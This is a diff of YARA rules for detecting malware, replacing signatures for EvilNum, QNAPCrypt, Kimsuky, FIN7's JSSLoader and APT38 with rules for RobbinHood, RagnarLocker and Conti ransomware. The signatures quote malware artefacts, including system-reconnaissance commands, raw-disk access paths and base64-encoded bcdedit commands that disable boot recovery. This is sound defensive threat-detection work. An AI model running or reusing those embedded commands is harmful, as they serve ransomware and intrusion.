+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-13/EvilNum/APT_EvilNum_LNK_Jul_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "4dbe5241b9f1b68a15193f3d5c7b0b5fac80208c16917b6e543ce407301f1dcf"
+		logic_hash = "d20aadfce6a0246f415f94a62edbf7fd48dcdcd9756a5a8d898a5459633b9350"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-		hash1 = "551e03e17d1df9bd5b712bec7763578c01e7bffe9b93db246e36ec0a174f7467"
-		hash2 = "670250a169ba548c07a5066a70087e83bbc7fd468ef46199d76f97f9e7f72f36"
-		hash3 = "6df0897d4eb0826c47850968708143ecb9b58a0f3453caa615c0f62396ef816b"
-		hash4 = "fedcce505a5e307c1d116d52b3122f6484b3d25fb3c4d666fe7af087cfe85349"
+		hash1 = "b60ae30ba90f852f886bb4e9aaabe910add2b70278e3a88a3b7968f644e10554"
+		hash2 = "bc203f44b48c9136786891be153311c37ce74ceb7eb540d515032c152f5eb2fb"
+		hash3 = "fefc9dbb46bc02a2bdccbf3c581d270f6341562e050e5357484ecae7e1e702f3"
 		tlp = "white"
-		adversary = "-"
+		adversary = "EvilNum"
 
 	strings:
-		$s1 = { 2d 00 20 00 20 00 00 00 80 00 80 08 00 00 00 00 00 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 25 00 05 }
-		$s2 = { 2d 2d 2d 2d 2d 45 4e 44 20 00 00 00 00 00 00 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 }
-		$s3 = { 52 65 71 75 69 72 65 64 55 73 65 72 2d 41 67 65 6e 74 3a 20 25 73 0d 0a 57 77 77 2d 41 75 74 68 65 6e 74 69 63 61 74 65 5a 61 6e 61 62 61 7a 61 72 5f 53 71 75 61 72 65 0a 72 75 6e 74 69 6d 65 20 73 74 61 63 6b 3a }
-		$s4 = { 34 10 90 e5 80 20 9f e5 04 20 8d e5 08 10 8d e5 c8 10 9f e5 0c 10 8d e5 0a 30 a0 e3 10 30 8d e5 53 4e f8 eb 14 00 9d e5 00 10 90 e5 04 00 90 e5 00 00 50 e3 0c 00 00 da 04 00 91 e5 00 10 91 e5 04 10 8d e5 08 00 8d e5 94 00 9f e5 0c 00 8d e5 05 00 a0 e3 10 00 8d e5 15 e2 ff eb 14 00 dd e5 01 10 20 e2 84 00 9d e5 09 fe ff ea 00 00 a0 e3 00 10 a0 e3 f1 ff ff ea 0e 30 a0 e1 56 76 f9 eb fa }
-		$s5 = { 89 7c 24 2c 83 fe 20 19 db 89 f1 bf 01 00 00 00 d3 e7 21 df 89 fb 83 c7 ff 89 7c 24 24 83 c1 e0 89 4c 24 3c 83 f9 20 19 f6 f7 d9 89 4c 24 38 83 f9 20 19 ff 8b 4c 24 3c ba 01 00 00 00 d3 e2 21 f2 8b 4c 24 38 be 01 00 00 00 d3 ee 21 fe 09 d6 83 c3 ff 83 d6 ff 89 74 24 34 8b 54 24 44 8b 5c 24 2c 8b 7c 24 40 8b 4c 24 28 89 44 24 48 31 c0 89 44 24 30 31 c0 89 44 24 20 31 c0 89 44 24 1c }
-		$s6 = { 65 8b 0d 00 00 00 00 8b 89 fc ff ff ff 3b 61 08 0f 86 44 03 00 00 83 ec 58 c7 44 24 20 00 00 00 00 c7 44 24 24 00 00 00 00 8d 05 60 c3 27 08 89 44 24 20 8d 0d 28 af 31 08 89 4c 24 24 8b 0d 4c 35 4c 08 8d 15 50 e8 31 08 89 14 24 89 4c 24 04 8d 4c 24 20 89 4c 24 08 c7 44 24 0c 01 00 00 00 c7 44 24 10 01 00 00 00 e8 63 b9 ea ff 90 c7 05 94 38 4c 08 06 00 00 00 8b 05 d0 50 4d 08 85 c0 0f 85 b3 02 00 00 8d 05 1a d3 2b 08 89 05 90 38 4c 08 8b 05 a4 34 4c 08 89 04 24 8d 05 10 02 32 08 89 44 24 04 8d 05 90 38 4c 08 89 44 24 08 }
-		$x1 = { e8 [2] e4 ff 8b 44 24 08 89 44 24 28 8b 4c 24 0c 89 4c 24 2c 31 d2 31 db eb 18 8b 6c 24 40 83 c5 01 8b 54 24 44 83 d2 00 8b 44 24 28 8b 4c 24 2c 89 eb 39 ca 87 dd 0f ?? c3 87 dd }
-		$x2 = { 8b ?? 20 89 ?? 24 ff d0 8b 44 24 ?? 89 44 24 ?? 8b 4c 24 ?? 89 4c 24 ?? c7 44 24 68 65 43 68 30 c7 44 24 6c 72 61 69 78 89 ?? 24 89 ?? 24 04 e8 [2] e4 ff }
-		$x3 = { 74 11 90 e5 70 21 90 e5 68 31 90 e5 6c 41 90 e5 04 30 8d e5 08 40 8d e5 0c 20 8d e5 10 10 8d e5 91 5c fe eb 1c 00 9d e5 18 10 9d e5 14 30 9d e5 78 20 9d e5 40 10 82 e5 44 00 82 e5 ac b6 9f e5 00 00 9b e5 00 00 50 e3 27 06 00 1a 3c 30 82 e5 7c 02 9d e5 20 10 80 e2 1b 2e 8d e2 f9 0d fc eb 04 20 8d e2 1b 1e 8d e2 f6 0d fc eb 9e f4 ff eb 34 00 9d e5 78 30 9d e5 48 00 83 e5 7c 02 9d e5 d4 40 90 e5 d0 50 90 e5 cc 60 90 e5 04 60 8d e5 08 50 8d e5 0c 40 8d e5 fe f5 ff eb 10 00 9d e5 78 30 9d e5 4c 00 83 e5 04 00 8d e5 7c 02 9d e5 c0 40 80 e2 08 40 8d e5 8c fa ff eb 0c 00 9d e5 18 30 9d e5 10 40 9d e5 14 50 9d e5 78 60 9d e5 50 00 86 e5 14 b6 9f e5 00 00 9b e5 00 }
-		$x4 = { d0 00 8d e5 05 00 53 e3 a0 05 00 1a 00 30 d2 e5 68 00 53 e3 9a 05 00 1a 01 30 d2 e5 74 00 53 e3 94 05 00 1a 02 30 d2 e5 74 00 53 e3 8e 05 00 1a 03 30 d2 e5 70 00 53 e3 88 05 00 1a 04 20 d2 e5 73 00 52 e3 82 05 00 1a 9c 22 9d e5 54 30 92 e5 00 00 53 e3 72 04 00 0a 00 00 51 e3 6a 04 00 1a b4 12 9d e5 b8 32 9d e5 54 70 92 e5 58 07 9f e5 }
-		$x5 = { 55 6e 61 62 6c 65 20 74 6f 20 63 72 65 61 74 65 20 70 69 64 20 66 69 6c 65 20 3a 20 25 76 }
-		$x6 = { 53 61 76 65 20 63 75 72 72 20 50 49 44 20 25 64 }
+		$s1 = "1-5-21-669817101-1001941732-3035937113-1000" fullword wide
+		$s2 = "*..\\..\\..\\..\\..\\..\\Windows\\System32\\cmd.exe" fullword wide
+		$s3 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+		$s4 = "System32 (C:\\Windows)" fullword wide
+		$s5 = { 3d 00 25 00 74 00 6d 00 70 00 25 00 5c 00 74 00 65 00 73 00 74 00 2e 00 63 00 26 }
+		$s6 = { 3c 00 22 00 25 [5] 25 00 6d 00 64 00 22 00 26 00 6e 00 65 00 74 00 73 00 74 00 61 00 74 00 20 00 2d }
+		$s7 = { 43 00 3a 00 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 69 00 6c 00 65 00 73 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 4e 00 54 00 5c 00 41 00 63 00 63 00 65 00 73 00 73 00 6f 00 72 00 69 00 65 00 73 00 5c 00 77 00 6f 00 72 00 64 00 70 00 61 00 64 00 2e 00 65 00 78 00 65 }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and filesize > 25KB and 3 of ( $s* ) and 2 of ( $x* )
+		filesize > 60KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Qnapcrypt_Aug_2021_2 : FILE
+rule ARKBIRD_SOLG_Ran_Robbinhood_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect QNAPCrypt ransomware (x64 version)"
+		description = "Detect RobbinHood ransomware"
 		author = "Arkbird_SOLG"
-		id = "8cd54646-87da-5261-82f3-68ab96549379"
-		date = "2021-08-11"
-		modified = "2021-08-12"
-		reference = "https://bazaar.abuse.ch/browse/tag/QNAPCrypt/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-11/QNAPCrypt/RAN_ELF_QNAPCrypt_Aug_2021_2.yara#L1-L22"
+		id = "adaacb06-0738-5d2b-b97e-b9007341f743"
+		date = "2020-11-04"
+		modified = "2020-11-05"
+		reference = "https://twitter.com/joakimkennedy/status/1323957238680178689"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-05/RobbinHood/Ran_RobbinHood_Oct_2020_1.yar#L1-L20"
 		license_url = "N/A"
-		logic_hash = "9eb3a499afbaaf2addb8ee12cc2d479ebbacd4d19cc270e995f12e83546008b4"
+		logic_hash = "72d0e9b1e2f6aee8f24125e6e6801329e2fad016f05a94ad65c04874a016d09d"
 		score = 75
-		quality = 73
+		quality = 67
 		tags = "FILE"
-		hash1 = "4829041c64971a0cb37d55e6ba83a57e01e76b26f3f744814b59bedbb3fefce8"
-		hash2 = "50470f94e7d65b50bf00d7416a9634d9e4141c5109a78f5769e4204906ab5f0b"
-		hash3 = "f9f5265f4c748ce0e2171915fb8edb6d967539ac46d624db8eb2586854dd0d9e"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "7c7ef3ab31ab91a7379bc2e3f32473dfa7adf662d0c640ef994103f6022a092b"
+		hash2 = "f927dd9044d7fa874dc6b98a0f5c9c647f3a9e5393bfe034b425cbf8db93e501"
+		hash2 = "3f56501f764d49723188bb119845fec4f2419a5080b74513fd0734e2a628e754"
 
 	strings:
-		$s1 = { 52 45 41 44 4d 45 5f 46 4f 52 5f 44 45 43 52 59 50 54 }
-		$s2 = { 64 48 8b 0c 25 f8 ff ff ff 48 8d 44 24 ?? 48 3b 41 10 0f 86 [2] 00 00 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 48 8b 05 [3] 00 48 83 3d [3] 00 00 0f 86 [2] 00 00 48 8b 48 08 48 8b 00 48 89 04 24 48 89 4c 24 08 e8 [3] ff 48 c7 04 24 20 00 00 00 e8 [2] 00 00 48 c7 04 24 00 00 00 00 e8 [3] ff 48 8b 44 24 20 48 89 44 24 58 48 8b 4c 24 18 48 89 8c 24 88 00 00 00 48 8b 54 24 28 48 89 54 24 60 48 }
-		$s3 = { 48 81 ec ?? 00 00 00 48 89 ac 24 ?? 00 00 00 48 8d ac 24 ?? 00 00 00 }
-		$s4 = { 64 48 8b 0c 25 f8 ff ff ff 48 [0-5] 3b ?? 10 0f 86 [2] 00 00 48 ?? ec }
-		$s5 = { 48 83 ec 78 48 89 6c 24 70 48 8d 6c 24 70 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8b 15 [3] 00 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [3] ff 48 8b 44 24 18 48 85 c0 0f 84 10 01 00 00 48 8b 48 28 48 8b 50 20 48 8b 40 18 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 e8 [3] ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 8b 5c 24 30 48 85 d2 0f 85 a3 00 00 00 48 8d 15 [2] 03 00 48 39 d0 0f 85 13 01 00 00 48 8b 05 [3] 00 48 8b 15 [3] 00 48 89 04 24 48 89 54 24 08 48 89 4c 24 10 48 8b 84 24 80 00 00 00 48 89 44 24 18 48 8b 84 24 88 00 00 00 48 89 44 24 20 48 8b 84 24 90 00 00 00 48 89 44 24 28 e8 [3] ff 48 8b 44 24 38 48 8b 4c 24 40 48 8b 54 24 48 48 8b 5c 24 50 48 8b 74 24 30 48 89 b4 24 98 00 00 00 48 89 84 24 a0 00 00 00 48 89 8c 24 a8 00 00 00 48 89 94 24 b0 00 00 00 48 89 9c 24 b8 00 00 00 48 8b 6c 24 }
-		$s6 = { 48 81 ec 48 01 00 00 48 89 ac 24 40 01 00 00 48 8d ac 24 40 01 00 00 48 8d 7c 24 38 48 8d 35 [2] 0f 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 [3] ff 48 8b 6d 00 48 8d 05 [2] 02 00 48 89 04 24 48 8b 84 24 50 01 00 00 48 89 44 24 08 48 89 44 24 10 e8 [3] ff 48 8b 44 24 18 48 89 84 24 38 01 00 00 31 c9 eb 18 8b 54 84 38 48 8b 5c 24 30 48 8b 84 24 38 01 00 00 89 14 98 48 8d 4b 01 48 8b 94 24 50 01 00 00 48 39 d1 7d 2c 48 89 4c 24 30 90 48 8b 05 [3] 00 48 89 04 24 48 c7 44 24 08 40 00 00 00 e8 [3] ff 48 8b 44 24 10 48 83 f8 40 72 b1 eb 46 48 c7 04 24 00 00 00 00 48 89 44 24 08 48 89 54 24 10 48 89 54 24 18 e8 [3] ff 48 8b 44 24 28 48 8b 4c 24 20 48 89 8c 24 58 01 00 00 48 89 84 24 60 01 00 00 48 8b ac 24 40 01 00 }
+		$seq = { 20 21 3d 20 20 3c 3d 3d 20 61 73 20 20 61 74 20 20 66 70 3d 20 69 73 20 20 6c 72 3a 20 6f 66 20 20 6f 6e 20 20 70 63 3d 20 73 70 3a 20 73 70 3d 25 76 0d 0a 29 20 3d 20 29 20 6d 3d 2b 49 6e 66 2c 20 6e 20 2d 49 6e 66 2e 62 61 74 2e 63 6d 64 2e 63 6f 6d 2e 65 78 65 2f 50 49 44 31 30 36 30 33 31 32 35 3a 20 70 3d 41 43 44 54 41 43 53 54 41 45 44 54 41 45 53 54 41 4b 44 54 41 4b 53 54 41 57 53 54 41 68 6f 6d 41 74 6f 69 43 45 53 54 43 68 61 6d 44 61 73 68 45 45 53 54 47 4f 47 43 4a 75 6c 79 4a 75 6e 65 4c 69 73 75 4d 32 52 74 4d 32 52 7a 4d 32 5a 79 4d 32 63 79 4d 32 64 77 4d 33 42 79 4d 69 61 6f 4d 6f 64 69 4e 33 6f 3d 4e 5a 44 54 4e 5a 53 54 4e 65 77 61 4e 6a 41 79 51 56 4a 44 51 56 5a 51 53 41 53 54 53 74 61 74 54 55 31 54 54 68 61 69 54 6b 56 47 55 46 42 55 57 45 53 54 57 45 78 54 59 32 31 30 59 32 31 6b 59 32 35 6d 59 32 46 69 59 32 46 7a 59 32 4d 3d 59 32 52 34 59 32 52 6d 59 32 52 79 59 32 55 78 59 32 55 79 59 32 56 79 59 32 5a 6e 59 32 5a 77 59 32 5a 79 59 32 64 74 59 32 68 74 59 32 6c 69 59 32 78 7a 59 33 42 70 59 33 42 77 59 33 49 79 59 33 4a 30 59 33 4a 33 59 33 4d 3d 59 33 4e 32 59 33 4e 6f 59 33 4e 73 59 33 4e 79 59 33 4e 7a 59 33 52 6d 59 57 39 70 59 57 46 6a 59 57 49 30 59 57 4a 72 59 57 4e 30 59 57 4e 6f 59 57 4e 77 59 57 4e 79 59 57 52 69 59 57 52 70 59 57 52 77 59 57 52 7a 59 57 56 7a 59 57 6b 3d 59 57 6c 30 59 57 6c 6d 59 57 70 73 59 57 77 3d 59 58 42 71 59 58 42 72 59 58 4a 33 59 58 4e 30 59 58 4e 34 59 58 4e 6a 59 58 4e 6d 59 58 4e 74 59 58 4e 77 59 58 5a 70 59 58 64 6e 59 6d 31 77 59 6d 46 30 59 6d 46 35 59 6d 46 6a 59 6d 46 72 59 6d 46 79 59 6d 4d 32 59 6d 4d 33 59 6d 4e 76 59 6d 52 69 59 6d 5a 6d 59 6d 64 30 59 6d 6c 6e 59 6d 6c 72 59 6d 6c 75 59 6d 74 36 59 6d 74 6d 59 6d 74 77 59 6e 42 33 59 6e 4a 6b 59 6e 4e 68 59 6e 56 77 59 6e 6f 79 59 77 3d 3d 5a 32 38 3d 5a 32 46 74 5a 32 52 69 5a 32 68 76 5a 32 6c 6d 5a 33 42 6e 5a 33 4a 35 5a 33 6f 3d 5a 47 31 77 5a 47 35 6e 5a 47 39 30 5a 47 39 6a 5a 47 46 30 5a 47 46 6a 5a 47 46 7a 5a 47 49 3d 5a 47 49 77 5a 47 49 7a 5a 47 4a 34 5a 47 4a 68 5a 47 4a 6d 5a 47 4d 79 5a 47 4e 6f 5a 47 4e 79 5a 47 4e 7a 5a 47 52 6b 5a 47 52 7a 5a 47 56 74 5a 47 56 79 5a 47 56 7a 5a 47 5a 7a 5a 47 64 6a 5a 47 6c 30 5a 47 6c 6d 5a 47 6c 74 5a 47 6c 77 5a 47 6c 79 5a 47 70 32 5a 48 4a 33 5a 48 4a 6d 5a 48 4e 30 5a 48 4e 69 5a 48 4e 72 5a 48 52 6b 5a 48 64 6d 5a 48 64 6e 5a 48 64 7a 5a 48 68 30 5a 48 68 34 5a 48 68 69 5a 48 68 6d 5a 48 68 6e 5a 57 31 73 5a 57 52 69 5a 58 42 72 5a 58 42 7a 5a 58 4a 6d 5a 58 4e 74 5a 58 68 6d 5a 6d 31 69 5a 6d 39 7a 5a 6d 4a 33 5a 6d 52 69 5a 6d 59 3d 5a 6d 5a 6b 5a 6d 5a 6d 5a 6d 67 3d 5a 6d 68 6b 5a 6d 78 32 5a 6d 78 68 5a 6d 78 6d 5a 6e 42 34 5a 6e 42 72 5a 6e 4a 74 5a 6e 4e 6f 5a 6e 56 73 5a 6e 68 6e 0a 09 6d 3d 5d }
+		$com1 = "os/exec.(*Cmd).Run" fullword ascii
+		$com2 = "os/exec.(*Cmd).Start" fullword ascii
+		$com3 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 31 2e 76 62 73 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 32 2e 76 62 73 43 }
+		$str1 = { 63 6d 64 7a 63 7a 4e 68 63 73 }
+		$str2 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 69 62 32 39 30 63 33 52 68 64 48 56 7a 63 47 39 73 61 57 4e 35 49 47 6c 6e 62 6d 39 79 5a 57 46 73 62 47 5a 68 61 57 78 31 63 6d 56 7a }
+		$str3 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 79 5a 57 4e 76 64 6d 56 79 65 57 56 75 59 57 4a 73 5a 57 51 67 62 6d 38 3d }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and filesize > 25KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 600KB and $seq and 2 of ( $com* ) and 2 of ( $str* )
 }
-rule ARKBIRD_SOLG_APT_Kimsuky_Aug_2020_1 : FILE
+rule ARKBIRD_SOLG_Ran_Mem_Ragnarlocker_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect Gold Dragon used by Kimsuky APT group"
+		description = "Detect memory artefacts of the Ragnarlocker ransomware (Nov 2020)"
 		author = "Arkbird_SOLG"
-		id = "dd79aa3b-0bbc-5fdd-808e-c2dee6d89804"
-		date = "2020-08-31"
-		modified = "2020-09-14"
+		id = "910774ab-9ad6-5c56-a921-203f61c9d7f7"
+		date = "2020-11-26"
+		modified = "2020-11-27"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-09-14/Kimsuky/APT_Kimsuky_Aug_2020_1.yar#L1-L23"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-27/Ran_RagnarLocker_Nov_2020_1.yar#L3-L33"
 		license_url = "N/A"
-		logic_hash = "4644ea81535c867a36a882bb270cea784ae135e7acc7078823be0579b1746932"
+		logic_hash = "2cb26677b8f4e464750eb8dec0638fd3f9a28500e68f64d62e99236c93895c85"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		hash1 = "4ff2a67b094bcc56df1aec016191465be4e7de348360fd307d1929dc9cbab39f"
-		hash2 = "97935fb0b5545a44e136ee07df38e9ad4f151c81f5753de4b59a92265ac14448"
+		hash1 = "041fd213326dd5c10a16caf88ff076bb98c68c052284430fba5f601023d39a14"
+		hash2 = "dd79b2abc21e766fe3076038482ded43e5069a1af9e0ad29e06dce387bfae900"
 
 	strings:
-		$s1 = "/c systeminfo >> %s" fullword ascii
-		$s2 = "/c dir %s\\ >> %s" fullword ascii
-		$s3 = ".?AVGen3@@" fullword ascii
-		$s4 = { 48 6f 73 74 3a 20 25 73 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 25 73 25 73 0d 0a 25 73 0d 0a 25 73 }
-		$s5 = "%s?filename=%s" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"userfile\"; filename=\"" fullword ascii
-		$s7 = "Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywhpFxMBe19cSjFnG" fullword ascii
-		$s8 = "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"" fullword ascii
-		$s9 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" fullword ascii
-		$s10 = "\\Microsoft\\HNC" fullword ascii
-		$s11 = "Mozilla/5.0" fullword ascii
+		$s1 = "\\\\.\\PHYSICALDRIVE%d" fullword wide
+		$s2 = "bootfont.bin" fullword wide
+		$s3 = "bootsect.bak" fullword wide
+		$s4 = "bootmgr.efi" fullword wide
+		$s5 = "---RAGNAR SECRET---" fullword ascii
+		$s6 = "Mozilla"
+		$s7 = "Internet Explorer" fullword wide
+		$s8 = "  </trustInfo>" fullword ascii
+		$s9 = "Tor browser" fullword wide
+		$s10 = "Opera Software" fullword wide
+		$s11 = "---END RAGN KEY---" fullword ascii
+		$s12 = "---BEGIN RAGN KEY---" fullword ascii
+		$s13 = "%s-%s-%s-%s-%s" fullword wide
+		$s14 = "$Recycle.Bin" fullword wide
+		$s15 = "***********************************************************************************" fullword ascii
+		$s16 = "K<^_[]" fullword ascii
+		$s17 = "SD;SDw" fullword ascii
+		$s18 = "Windows.old" fullword wide
+		$s19 = "iconcache.db" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 150KB and 8 of them
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 12 of them
 }
-rule ARKBIRD_SOLG_MAL_Jssloader_Jun_2021_1 : FILE
+
+rule ARKBIRD_SOLG_Ran_Cert_Ragnarlocker_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect JSSLoader malware"
+		description = "Detect certificates and VMProtect used for the Ragnarlocker ransomware (Nov 2020)"
 		author = "Arkbird_SOLG"
-		id = "192b1386-f0bc-54e8-9341-84f77f4f07c5"
-		date = "2021-06-04"
-		modified = "2021-06-05"
+		id = "85d51804-eebd-5353-8bd9-01756e7f7d07"
+		date = "2020-11-26"
+		modified = "2020-11-27"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-04/FIN7/MAL_JSSLoader_Jun_2021_1.yara#L1-L20"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-27/Ran_RagnarLocker_Nov_2020_1.yar#L35-L55"
 		license_url = "N/A"
-		logic_hash = "73942afed6b3471be07be1fba3e7f90ec7f2377a1167aeef70627cd07faa3681"
-		score = 75
+		logic_hash = "8171128426b48102457f5ba0771b27aaf5f4562293aff04c256bd5bd721a908e"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "59c6acc8f6771ea6eeb8d8f03832642d87f9aa7eb0c3205398d31ad08e019a9c"
-		hash2 = "2609c6ec5d4fdde28d29c272484da66e0995e529cf302ed46f94c68cd99352e3"
-		hash3 = "ea167f5460c5f920699e276fb0c51f32c862256415c57edb4bda5760a70b9e4d"
-		hash4 = "822457c427a0776b41dd8f3479070e56fdd53ccd0175418d4e7d85065ec7d7d1"
-		tlp = "White"
-		adversary = "FIN7"
+		level = "Experimental"
+		hash1 = "afab912c41c920c867f1b2ada34114b22dcc9c5f3666edbfc4e9936c29a17a68"
+		hash2 = "9416e5a57e6de00c685560fa9fee761126569d123f62060792bf2049ebba4151"
 
 	strings:
-		$s1 = { 8b 45 c8 83 78 0c 00 0f 84 ce 00 00 00 8b 45 c8 8b 4d 08 03 48 0c 8b f4 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 bc 83 7d bc 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d 08 03 48 10 89 4d f8 8b 45 c8 8b 4d 08 03 08 89 4d ec 8b 45 ec 3b 45 08 75 06 8b 45 f8 89 45 ec 8b 45 ec 83 38 00 74 6c 8b 45 ec 8b 08 81 e1 00 00 00 }
-		$s2 = { 8b f4 6a 04 68 00 10 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 f8 83 7d f8 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 8b 45 c8 8b 08 51 8b 55 f8 52 e8 [2] 00 00 83 c4 0c 8b f4 8b 45 f8 50 8b fc ff 15 [3] 00 3b fc e8 [2] 00 00 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b f4 6a 04 68 00 10 00 00 68 00 11 00 00 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 ec 83 7d ec 00 75 02 eb 3e 8b 45 c8 8b 48 08 8b 11 89 55 e0 83 7d e0 ff 75 0c c7 85 00 ff ff ff 00 00 00 00 eb 09 8b 45 e0 89 85 00 ff ff ff 8b 8d 00 ff ff ff 8b 55 ec 8b 45 f8 89 04 8a 8b 45 ec 64 a3 2c 00 00 00 5f 5e 5b 81 c4 00 01 00 00 3b ec e8 [2] 00 00 8b e5 5d }
-		$s3 = { c7 45 f0 61 00 00 00 c7 45 c8 20 00 00 00 c7 45 cc 88 00 00 00 c7 45 dc 01 00 00 00 8d 45 f0 89 45 d0 33 c0 66 89 45 d4 c7 45 d8 00 00 00 00 c7 45 e0 00 00 00 00 8b 45 08 89 45 e4 8b f4 8d 45 c8 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 b0 83 7d b0 ff 74 17 8b f4 8d 45 bc 50 8b 4d b0 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 52 8b cd 50 8d 15 2c 13 40 00 e8 [2] 00 00 58 5a 5f 5e 5b 8b 4d fc 33 cd e8 [2] 00 00 81 c4 2c 01 00 00 3b ec e8 [2] 00 00 8b e5 }
-		$s4 = { 8b 45 ec 8b 08 81 e1 ff ff 00 00 8b f4 51 8b 55 bc 52 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 4d f8 89 01 eb 25 8b 45 ec 8b 08 8b 55 08 8d 44 0a 02 8b f4 50 8b 4d bc 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b 55 f8 89 02 8b 45 f8 83 c0 04 89 45 f8 8b 45 ec 83 c0 04 89 45 ec eb 8c 8b 45 c8 83 c0 14 89 45 c8 e9 25 ff ff ff 5f 5e 5b 81 c4 08 01 00 00 3b ec e8 [2] 00 00 8b e5 }
+		$vmp0 = { 2E 76 6D 70 30 00 00 00 }
+		$vmp1 = { 2E 76 6D 70 31 00 00 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and filesize < 900KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 5000KB and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "GlobalSign" and pe.signatures [ i ] . serial == "68:65:29:4f:67:f0:c3:bb:2e:19:1f:75" ) and $vmp0 in ( 0x100 .. 0x300 ) and $vmp1 in ( 0x100 .. 0x300 )
 }
-rule ARKBIRD_SOLG_APT_APT38_Vsingle_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Conti_Loader_V3_Nov_2020_1 : FILE
 {
 	meta:
-		description = "Detect VSingle used in attacks against Japanese organisations by APT38"
+		description = "Detect Conti V3 loader"
 		author = "Arkbird_SOLG"
-		id = "d1d640f6-bcec-5364-8ea5-e0c0b86da6e1"
-		date = "2021-03-23"
-		modified = "2021-03-24"
+		id = "9541b9f8-befe-5bf4-88ee-b1cc5e92f927"
+		date = "2020-12-15"
+		modified = "2020-12-15"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-23/APT38/APT_APT38_VSingle_Mar_2021_1.yar#L1-L24"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-15/Conti/Ran_Conti_V3_Nov_2020_1.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "d01baac099ce33b837c83d6778900f7e55b8c63e75d0e552c10ababc8dec744c"
+		logic_hash = "c3c8530e1963c5af8ee93a5d2cc222abbeb3fb7e82ef6de2068795a38dca67aa"
 		score = 50
-		quality = 69
+		quality = 71
 		tags = "FILE"
-		hash1 = "487c1bdb65634a794fa5e359c383c94945ce9f0806fcad46440e919ba0e6166e"
 		level = "experimental"
+		hash1 = "707b752f6bd89d4f97d08602d0546a56d27acfe00e6d5df2a2cb67c5e2eeee30"
+		hash2 = "26b2401211769d2fa1415228b4b1305eeeed249a996d149ad83b6fc9c4f703ce"
 
 	strings:
